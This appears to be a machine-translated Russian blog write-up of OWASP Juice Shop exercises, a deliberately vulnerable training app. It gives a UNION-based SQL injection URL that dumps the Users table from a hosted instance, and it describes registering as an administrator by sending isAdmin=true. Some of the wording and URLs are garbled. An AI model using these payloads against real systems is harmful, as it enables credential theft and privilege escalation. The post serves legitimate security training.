Если вы пропустили первый день, проверьте это здесь:
https://medium.com/@osintiostom/owasp-juice-shop-63d1c328192b
Как получить список всех учетных данных пользователя с помощью SQL Injection
Я нашел это в main.js
Единственной страницей, которая предоставляла другую информацию, когда я вошел в систему, была /adminstration.
SQL-инъекция http://webapplication21.herokuapp.com/rest/product/search?q=’)) UNION SELECT FROM Users —
Пришлось исследовать, что это значит, в основном мне нужно указать количество столбцов
Прочтите это https://www.exploit-db.com/docs/41397
https://webapplication21.herokuapp.com/rest/product/search?=https://webapplication21.herokuapp.com/rest/product/search?q=%27))%20UNION%20SELECT%20%271%27 ,%20%272%27,%20%273%27,%20%274%27,%20%275%27,%20%276%27,%20%277%27,%20%278%27% 20FROM%20Users--
Трейл и ошибка с таблицами были немного сложными
Зарегистрируйтесь как администратор
Я нашел путь /api/Users ранее, просто знал, что он делает.
Решил наконец-то зарегистрироваться как новый, заметил, что просьба к Пользователям была сделана.
Нажал на «Пользователи» и заметил, что isAdmin отправляется как false, может быть, отправлен POST с истинным?????
Получить языковой файл, который так и не был запущен в производство.
Похоже, я начну с компонента, я также нахожу matcher: Ca довольно интересным. Проверка входа ctrl+f
ctrl+f пользователь (main.js)
https://webapplication21.herokuapp.com/api/Feedbacks
Пожалуйста, ознакомьтесь с приведенными ниже ссылками
Сайт резюме — https://tommarler.org
Linkedin — https://www.linkedin.com/in/tom-m-bb4857112/